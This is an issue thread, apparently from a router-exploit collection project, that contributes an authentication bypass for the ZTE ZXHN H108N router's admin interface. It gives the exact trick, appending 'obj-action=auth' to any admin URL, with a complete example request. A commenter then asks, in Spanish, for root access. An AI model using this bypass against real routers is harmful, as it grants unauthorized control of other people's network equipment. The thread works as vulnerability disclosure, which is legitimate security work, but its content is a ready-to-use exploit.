### ISSUE TITLE
Contribution: ZTE ZXHN H108N is vulnerable to authentication bypass

### ISSUE THREAD

**Issue by hkm** [hkm/routerpwn.com#1]
"The admin interface of Router ZTE ZXHN H108N is vulnerable to authentication bypass. You need to add the string ""obj-action=auth"" to the end of any url of the admin 
i.e. 
https://x.x.x.x/cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:page=wancfg&obj-action=auth"

hdanniel

**Comment by Peryc** [comment]
Hola quisiera el root
